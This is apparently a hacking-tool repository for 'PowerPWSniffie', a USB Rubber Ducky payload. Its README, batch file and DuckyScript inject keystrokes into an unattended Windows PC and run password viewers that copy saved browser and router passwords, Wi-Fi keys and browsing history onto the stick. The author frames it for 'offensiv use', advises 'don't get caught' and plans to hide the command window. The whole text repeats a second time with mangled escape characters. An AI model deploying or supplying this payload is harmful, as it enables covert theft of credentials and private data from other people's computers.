powerslaver85/PowerPWSniffie

## README.nfo
...................................................................................................
................MMMMMMM............................................................................
................MMMMMMM..................______............................_.......................
................MMMMMMM.................(_____ \..........................| |......................
................MMMMMMM................. _____) )__.._._._._____..____.___| |._____._..._._____....
......MMMMM.....MMMMMMM......MMMM.......|  ____/ _ \| | | | ___ |/ ___)___) |(____ | | | | ___ |...
....MMMMMMMM....MMMMMMM....MMMMMMMM.....| |...| |_| | | | | ____| |..|___ | |/ ___ |\ V /| ____|...
...MMMMMMMMMM...MMMMMMM....MMMMMMMMM....|_|....\___/.\___/|_____)_|..(___/.\_)_____|.\_/.|_____).CH
..MMMMMMMMMM....MMMMMMM....MMMMMMMMMM..............................................................
.MMMMMMMMMM.....MMMMMMM.....MMMMMMMMMM...Cyberarms and Security Tools / Visit www.powerslave.ch....
.MMMMMMMMM......MMMMMMM......MMMMMMMMM.............................................................
MMMMMMMMM.......MMMMMMM.......MMMMMMMMM.Document: 			Readme/NFO-File			            ...
MMMMMMMM........MMMMMMM........MMMMMMMM............................................................
MMMMMMMM........MMMMMMM........MMMMMMMM.Title:				PowerPWSniffie  		          	...
MMMMMMM..........MMMMM..........MMMMMMM.Date:				03. July 2013				    	...
MMMMMMM........................MMMMMMMM.Author:				Powerslave himself          		...
MMMMMMMM.......................MMMMMMMM.Language:		    Ducky Script & Bash					...
MMMMMMMM.......................MMMMMMMM.Target OS:		    Windows 7 x64 w/o UAC               ...
MMMMMMMMM.....................MMMMMMMMM.Tool type:			Password & Web History HiJacker	 	...
.MMMMMMMMM...................MMMMMMMMM..Version:            0.9.2 Beta / Untested  			    ...
..MMMMMMMMMM...............MMMMMMMMMM...Contact:			powerslave.alternative@gmail.com    ...
...MMMMMMMMMMM...........MMMMMMMMMMM...............................................................
....MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM.....Note: I won't take any responsibility for illegal stuff ...
.....MMMMMMMMMMMMMMMMMMMMMMMMMMMMM......someone except me could do! I wrote it for learning and	...
.......MMMMMMMMMMMMMMMMMMMMMMMMM........experimental reasons. Use but don't abuse				...
.........MMMMMMMMMMMMMMMMMMMMM.....................................................................
............MMMMMMMMMMMMMMM........................................................................
...................................................................................................
...................................................................................................
...................................................................................................
.																								  .
. PowerPWSniffie general informations															  .
.																								  .
. PowerPWSniffie is a Payload for the HAK5/USB_Rubber_Ducky, if you don't own a Rubber Ducky you  .
. can order one at http://hakshop.myshopify.com/products/usb-rubber-ducky.  					  .
. However, this toolkit includes a set of freeware password sniffers and a batch file (launch.bat).
. which will run on a regular USB Stick aswell, you just need to name it DUCKY (Important!) and   .
. you have to run the "launch.bat" file by clicking it.											  .
.																								  .
. But i strongly recommend using the Ducky, everything runs automatically, no need to touch the   .
. mouse of the target PC and its a really nifty toy for other stuff too, just get one. Trust me   .
.																								  .
. 1. Setting up the duck																		  .
.																								  .
. To run this Payload on the Rubber Ducky, you need to make sure that you run the right firmware. .
. Since we use the Ducky as Mule for the Password Sniffer .exe files and the Batch file, maybe    .
. there is a better way in the future since its a pretty slow device if it comes to file traffic. .
. However, i decided to use the C_Duck Firmware (Version 2.1) you can download the firmware from  .
. https://code.google.com/p/ducky-decode/downloads/list , you will find other apps we will need   .
. aswell there, and a guide on how to flash the Duck with other firmwares like C_Duck. I won't    .
. explain it here, since the guide on the Wiki site is very nice and there is no need to write    .
. another one. I know i am lazy, sorry ;-) 														  .
. After that copy the folders exec and logs in the Root directory of the microSD card. next comes .
. the payload.                                                        							  .
.																								  .
. 2. Encoding the Payload																		  .
. 																								  .
. Follow the Guide on: https://code.google.com/p/ducky-decode/wiki/Payload_Guide , use the encoder.
. on the "PWsniffer.txt" file inside the "payload" folder. The Powershell prompt sould look some- .
. thing like that: PS C:\Ducky Encoder\> java -jar encoder.jar -i PWsniffer.txt -o inject.bin  ** .
. ** depending on your keyboard layout you need to add -l resources\us.properties (us = USA)      .
. Now make sure the fresh encoded inject.bin is copied in the root directory of the microSD card. .
. Instead of encoding it yourself you can use the inject.bin file i encoded, however i don't      .
. recommend using inject.bin files from others, you never know what is really inside.			  .
. But of course i am one of the nice guys and i won't harm you, or do i?  						  .
. In version 0.9.3 Lite there are two payloads the one for offensiv use is filename.payload.txt   .
. the other "filename.develop.txt" is for testing stuff, the only difference is the starting delay.
.																								  .
. 3. Let the duck do the job! 																	  .
. 																								  .
. Well if everything worked fine until now, and the encoded inject.bin is on a microSD placed     .
. a duck butt, you are ready for a first test run. Depending on the start DELAY the duck will     .
. run after a second (This is default setting for testing on your own box). However, if you       .
. use the rubber ducky on a "virgin" machine, which had never contact with a ducky, there will    .
. be a initial deadline, since the driver has to be installed on windows first, the good thing:   .
. this happens automatically, you don't even have to click (This is a w/o UAC Payload).           .
. The bad thing: this may take some time, depending on the power of the target PC, i am working   .
. on a fast Box with 8 Core I7 Ivy Bridge CPU, and 16 Gigs of RAM, running with a semi-fast HDD.  .
. This is my working PC, the initial driver setup still needs like 10 sec, so 2x a DELAY 10000    .
. may not be the worst idea, but don't forget, 20 seconds can be an eternity depending on the Job .
. 																								  .
. 4. The end																					  .
.																								  .
. Since, this payload is still in development, nothing is really done, the readme isn't done the  .
. speed is still slow, but its still working, and there is potential.							  .
.																								  .
. 5. The future																					  .
.																								  .
. First, the script will be tweaked and tested on other machines, top priority has the speed.     .
. another task is hiding the CMD window, and the batch file still needs some modifications.       .
. Well i don't know alot about copyright, but everything inside this archive is freeware.         .
. My payload is open-source and free aswell, use it as you wish, enhance it, whatever.            .
. BUT: I won't take any responsibility for anything that may happen with this tool, i actually    .
. use it to gather my own accounts and store them somewhere safe, pretty usefull and nobody       .
. dies. Use but don't abuse, or at least, don't get caught...                                     .
.                                                                                                 .
. PS: i know my english sucks very hard, if you want to correct it and send me a clean version    .
. back, i won't stop you.                                                    POWERSLAVE           .
...................................................................................................

## launch.bat
start %DUCKYdrive%\exec\WebBrowserPassView.exe /stext %DUCKYdrive%\logs\WebBrowserPassLog.txt
start %DUCKYdrive%\exec\RouterPassView.exe /stext %DUCKYdrive%\logs\RouterPassLog.txt
start %DUCKYdrive%\exec\BrowsingHistoryView.exe /stext %DUCKYdrive%\logs\BrowsingHistoryLog.txt
start %DUCKYdrive%\exec\WirelessKeyView.exe /stext %DUCKYdrive%\logs\WirelessKeyLog.txt
exit


## PowerPWSniffie
 http://www.powerslave.ch/?attachment_id=162

## PowerPWSniffie Payload
REM	   Author: Powerslave* ** / Language/Type: DuckyScript/ASCII / Version: 0.9.3 Beta Lite / RC1
REM	   *Original Script and app collection from Mr. Grey @ Hak5 Forums.
REM	   Title: PowerPWSniffie for Rubber Ducky (Composite Ducky Firmware)
REM
REM	   Description: check the REAME.nfo, its made with love, i swear
REM
REM   a ______                            _
REM    (_____ \                          | |
REM     _____) )__  _ _ _ _____  ____ ___| | _____ _   _ _____
REM    |  ____/ _ \| | | | ___ |/ ___)___) |(____ | | | | ___ |
REM    | |   | |_| | | | | ____| |  |___ | |/ ___ |\ V /| ____|
REM    |_|    \___/ \___/|_____)_|  (___/ \_)_____| \_/ |_____).ch
REM
REM                                                            Product
REM Target: Windows 7 x64 / no UAC / Admin Login
REM
REM
REM Starting ducky script -- Set the start DELAY to 1000 if no Driver Install is needed.
DELAY 8000
ESCAPE
CONTROL ESCAPE
DELAY 10
STRING cmd
DELAY 100
ENTER
DELAY 50
STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
DELAY 50
ENTER
STRING %DUCKYdrive%\exec\launch.bat
ENTER

REM Notizen an mich: (You don't have to understand that ;-)
REM Muss noch getestet werden an VM und später an neutraler maschiene. Mal sehen wer sich als opfer anbietet.
	...................................................................................................
	................MMMMMMM............................................................................
	................MMMMMMM..................______............................_.......................
	................MMMMMMM.................(_____ \..........................\| \|......................
	................MMMMMMM................. _____) )__.._._._._____..____.___\| \|._____._..._._____....
	......MMMMM.....MMMMMMM......MMMM.......\| ____/ _ \\| \| \| \| ___ \|/ ___)___) \|(____ \| \| \| \| ___ \|...
	....MMMMMMMM....MMMMMMM....MMMMMMMM.....\| \|...\| \|_\| \| \| \| \| ____\| \|..\|___ \| \|/ ___ \|\ V /\| ____\|...
	...MMMMMMMMMM...MMMMMMM....MMMMMMMMM....\|_\|....\___/.\___/\|_____)_\|..(___/.\_)_____\|.\_/.\|_____).CH
	..MMMMMMMMMM....MMMMMMM....MMMMMMMMMM..............................................................
	.MMMMMMMMMM.....MMMMMMM.....MMMMMMMMMM...Cyberarms and Security Tools / Visit www.powerslave.ch....
	.MMMMMMMMM......MMMMMMM......MMMMMMMMM.............................................................
	MMMMMMMMM.......MMMMMMM.......MMMMMMMMM.Document: Readme/NFO-File ...
	MMMMMMMM........MMMMMMM........MMMMMMMM............................................................
	MMMMMMMM........MMMMMMM........MMMMMMMM.Title: PowerPWSniffie ...
	MMMMMMM..........MMMMM..........MMMMMMM.Date: 03. July 2013 ...
	MMMMMMM........................MMMMMMMM.Author: Powerslave himself ...
	MMMMMMMM.......................MMMMMMMM.Language: Ducky Script & Bash ...
	MMMMMMMM.......................MMMMMMMM.Target OS: Windows 7 x64 w/o UAC ...
	MMMMMMMMM.....................MMMMMMMMM.Tool type: Password & Web History HiJacker ...
	.MMMMMMMMM...................MMMMMMMMM..Version: 0.9.2 Beta / Untested ...
	..MMMMMMMMMM...............MMMMMMMMMM...Contact: powerslave.alternative@gmail.com ...
	...MMMMMMMMMMM...........MMMMMMMMMMM...............................................................
	....MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM.....Note: I won't take any responsibility for illegal stuff ...
	.....MMMMMMMMMMMMMMMMMMMMMMMMMMMMM......someone except me could do! I wrote it for learning and ...
	.......MMMMMMMMMMMMMMMMMMMMMMMMM........experimental reasons. Use but don't abuse ...
	.........MMMMMMMMMMMMMMMMMMMMM.....................................................................
	............MMMMMMMMMMMMMMM........................................................................
	...................................................................................................
	...................................................................................................
	...................................................................................................
	. .
	. PowerPWSniffie general informations .
	. .
	. PowerPWSniffie is a Payload for the HAK5/USB_Rubber_Ducky, if you don't own a Rubber Ducky you .
	. can order one at http://hakshop.myshopify.com/products/usb-rubber-ducky. .
	. However, this toolkit includes a set of freeware password sniffers and a batch file (launch.bat).
	. which will run on a regular USB Stick aswell, you just need to name it DUCKY (Important!) and .
	. you have to run the "launch.bat" file by clicking it. .
	. .
	. But i strongly recommend using the Ducky, everything runs automatically, no need to touch the .
	. mouse of the target PC and its a really nifty toy for other stuff too, just get one. Trust me .
	. .
	. 1. Setting up the duck .
	. .
	. To run this Payload on the Rubber Ducky, you need to make sure that you run the right firmware. .
	. Since we use the Ducky as Mule for the Password Sniffer .exe files and the Batch file, maybe .
	. there is a better way in the future since its a pretty slow device if it comes to file traffic. .
	. However, i decided to use the C_Duck Firmware (Version 2.1) you can download the firmware from .
	. https://code.google.com/p/ducky-decode/downloads/list , you will find other apps we will need .
	. aswell there, and a guide on how to flash the Duck with other firmwares like C_Duck. I won't .
	. explain it here, since the guide on the Wiki site is very nice and there is no need to write .
	. another one. I know i am lazy, sorry ;-) .
	. After that copy the folders exec and logs in the Root directory of the microSD card. next comes .
	. the payload. .
	. .
	. 2. Encoding the Payload .
	. .
	. Follow the Guide on: https://code.google.com/p/ducky-decode/wiki/Payload_Guide , use the encoder.
	. on the "PWsniffer.txt" file inside the "payload" folder. The Powershell prompt sould look some- .
	. thing like that: PS C:\Ducky Encoder\> java -jar encoder.jar -i PWsniffer.txt -o inject.bin ** .
	. ** depending on your keyboard layout you need to add -l resources\us.properties (us = USA) .
	. Now make sure the fresh encoded inject.bin is copied in the root directory of the microSD card. .
	. Instead of encoding it yourself you can use the inject.bin file i encoded, however i don't .
	. recommend using inject.bin files from others, you never know what is really inside. .
	. But of course i am one of the nice guys and i won't harm you, or do i? .
	. In version 0.9.3 Lite there are two payloads the one for offensiv use is filename.payload.txt .
	. the other "filename.develop.txt" is for testing stuff, the only difference is the starting delay.
	. .
	. 3. Let the duck do the job! .
	. .
	. Well if everything worked fine until now, and the encoded inject.bin is on a microSD placed .
	. a duck butt, you are ready for a first test run. Depending on the start DELAY the duck will .
	. run after a second (This is default setting for testing on your own box). However, if you .
	. use the rubber ducky on a "virgin" machine, which had never contact with a ducky, there will .
	. be a initial deadline, since the driver has to be installed on windows first, the good thing: .
	. this happens automatically, you don't even have to click (This is a w/o UAC Payload). .
	. The bad thing: this may take some time, depending on the power of the target PC, i am working .
	. on a fast Box with 8 Core I7 Ivy Bridge CPU, and 16 Gigs of RAM, running with a semi-fast HDD. .
	. This is my working PC, the initial driver setup still needs like 10 sec, so 2x a DELAY 10000 .
	. may not be the worst idea, but don't forget, 20 seconds can be an eternity depending on the Job .
	. .
	. 4. The end .
	. .
	. Since, this payload is still in development, nothing is really done, the readme isn't done the .
	. speed is still slow, but its still working, and there is potential. .
	. .
	. 5. The future .
	. .
	. First, the script will be tweaked and tested on other machines, top priority has the speed. .
	. another task is hiding the CMD window, and the batch file still needs some modifications. .
	. Well i don't know alot about copyright, but everything inside this archive is freeware. .
	. My payload is open-source and free aswell, use it as you wish, enhance it, whatever. .
	. BUT: I won't take any responsibility for anything that may happen with this tool, i actually .
	. use it to gather my own accounts and store them somewhere safe, pretty usefull and nobody .
	. dies. Use but don't abuse, or at least, don't get caught... .
	. .
	. PS: i know my english sucks very hard, if you want to correct it and send me a clean version .
	. back, i won't stop you. POWERSLAVE .
	...................................................................................................
	start %DUCKYdrive%\exec\WebBrowserPassView.exe /stext %DUCKYdrive%\logs\WebBrowserPassLog.txt
	start %DUCKYdrive%\exec\RouterPassView.exe /stext %DUCKYdrive%\logs\RouterPassLog.txt
	start %DUCKYdrive%\exec\BrowsingHistoryView.exe /stext %DUCKYdrive%\logs\BrowsingHistoryLog.txt
	start %DUCKYdrive%\exec\WirelessKeyView.exe /stext %DUCKYdrive%\logs\WirelessKeyLog.txt
	exit
	REM Author: Powerslave* ** / Language/Type: DuckyScript/ASCII / Version: 0.9.3 Beta Lite / RC1
	REM *Original Script and app collection from Mr. Grey @ Hak5 Forums.
	REM Title: PowerPWSniffie for Rubber Ducky (Composite Ducky Firmware)
	REM
	REM Description: check the REAME.nfo, its made with love, i swear
	REM
	REM a ______ _
	REM (_____ \ \| \|
	REM _____) )__ _ _ _ _____ ____ ___\| \| _____ _ _ _____
	REM \| ____/ _ \\| \| \| \| ___ \|/ ___)___) \|(____ \| \| \| \| ___ \|
	REM \| \| \| \|_\| \| \| \| \| ____\| \| \|___ \| \|/ ___ \|\ V /\| ____\|
	REM \|_\| \___/ \___/\|_____)_\| (___/ \_)_____\| \_/ \|_____).ch
	REM
	REM Product
	REM Target: Windows 7 x64 / no UAC / Admin Login
	REM
	REM
	REM Starting ducky script -- Set the start DELAY to 1000 if no Driver Install is needed.
	DELAY 8000
	ESCAPE
	CONTROL ESCAPE
	DELAY 10
	STRING cmd
	DELAY 100
	ENTER
	DELAY 50
	STRING for /f "tokens=3 delims= " %A in ('echo list volume ^\| diskpart ^\| findstr "DUCKY"') do (set DUCKYdrive=%A:)
	DELAY 50
	ENTER
	STRING %DUCKYdrive%\exec\launch.bat
	ENTER

	REM Notizen an mich: (You don't have to understand that ;-)
	REM Muss noch getestet werden an VM und später an neutraler maschiene. Mal sehen wer sich als opfer anbietet.